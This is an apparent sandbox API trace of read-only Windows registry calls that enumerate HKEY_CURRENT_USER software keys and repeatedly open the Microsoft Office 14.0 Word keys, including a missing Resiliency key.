[0086.587] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x394) returned 0x0
[0086.587] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppDataLow", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Clients", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.587] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Google", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IM Providers", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="JavaSoft", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Macromedia", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netscape", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegEnumKeyExW (in: hKey=0x394, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ODBC", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegEnumKeyExW (in: hKey=0x394, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Policies", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegEnumKeyExW (in: hKey=0x394, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wow6432Node", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegEnumKeyExW (in: hKey=0x394, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Classes", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x41c) returned 0x0
[0086.588] RegCloseKey (hKey=0x394) returned 0x0
[0086.588] RegQueryInfoKeyW (in: hKey=0x41c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.588] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Active Setup", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ActiveMovie", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Advanced INF Setup", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ASF Stream Descriptor File", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Assistance", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Command Processor", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CTF", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Direct3D", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventSystem", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Exchange", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fax", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Feeds", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.589] RegEnumKeyExW (in: hKey=0x41c, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="FTP", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.590] RegOpenKeyExW (in: hKey=0x41c, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x394) returned 0x0
[0086.590] RegCloseKey (hKey=0x41c) returned 0x0
[0086.590] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.590] RegOpenKeyExW (in: hKey=0x394, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x41c) returned 0x0
[0086.590] RegCloseKey (hKey=0x394) returned 0x0
[0086.590] RegQueryInfoKeyW (in: hKey=0x41c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.590] RegOpenKeyExW (in: hKey=0x41c, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x394) returned 0x0
[0086.590] RegCloseKey (hKey=0x41c) returned 0x0
[0086.590] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.590] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x0) returned 0x2
[0086.590] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.590] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x41c) returned 0x0
[0086.590] RegQueryInfoKeyW (in: hKey=0x41c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.590] RegOpenKeyExW (in: hKey=0x41c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x428) returned 0x0
[0086.591] RegCloseKey (hKey=0x41c) returned 0x0
[0086.591] RegQueryInfoKeyW (in: hKey=0x428, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.591] RegOpenKeyExW (in: hKey=0x428, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x41c) returned 0x0
[0086.591] RegCloseKey (hKey=0x428) returned 0x0
[0086.591] RegQueryInfoKeyW (in: hKey=0x41c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.591] RegOpenKeyExW (in: hKey=0x41c, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x428) returned 0x0
[0086.591] RegCloseKey (hKey=0x41c) returned 0x0
[0086.591] RegQueryInfoKeyW (in: hKey=0x428, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.591] RegOpenKeyExW (in: hKey=0x428, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x41c) returned 0x0
[0086.591] RegCloseKey (hKey=0x428) returned 0x0
[0086.591] RegQueryInfoKeyW (in: hKey=0x41c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.591] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x0) returned 0x2
[0086.591] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.591] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x428) returned 0x0
[0086.591] RegCloseKey (hKey=0x428) returned 0x0
[0086.592] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x428) returned 0x0
[0086.592] RegCloseKey (hKey=0x428) returned 0x0
[0086.592] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x428) returned 0x0
[0086.592] RegCloseKey (hKey=0x428) returned 0x0
[0086.592] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x428) returned 0x0
[0086.592] RegCloseKey (hKey=0x428) returned 0x0
[0086.592] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x428) returned 0x0
[0086.592] RegCloseKey (hKey=0x428) returned 0x0
[0086.592] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x428) returned 0x0
[0086.592] RegCloseKey (hKey=0x428) returned 0x0
[0086.592] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x428) returned 0x0
[0086.592] RegCloseKey (hKey=0x428) returned 0x0
[0086.592] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x428) returned 0x0
[0086.592] RegCloseKey (hKey=0x428) returned 0x0
[0086.593] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x428) returned 0x0
[0086.593] RegCloseKey (hKey=0x428) returned 0x0
[0086.593] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x428) returned 0x0
[0086.593] RegCloseKey (hKey=0x428) returned 0x0
[0086.593] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x428) returned 0x0
[0086.593] RegCloseKey (hKey=0x428) returned 0x0
[0086.593] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x428) returned 0x0
[0086.593] RegCloseKey (hKey=0x428) returned 0x0
[0086.593] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x428) returned 0x0
[0086.593] RegCloseKey (hKey=0x428) returned 0x0
[0086.593] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x428) returned 0x0
[0086.593] RegCloseKey (hKey=0x428) returned 0x0
[0086.593] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x428) returned 0x0
[0086.593] RegCloseKey (hKey=0x428) returned 0x0
[0086.594] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x428) returned 0x0
[0086.594] RegCloseKey (hKey=0x428) returned 0x0
[0086.594] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x428) returned 0x0
[0086.594] RegCloseKey (hKey=0x428) returned 0x0
[0086.594] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca38 | out: phkResult=0x1c81ca38*=0x428) returned 0x0
[0086.594] RegCloseKey (hKey=0x428) returned 0x0
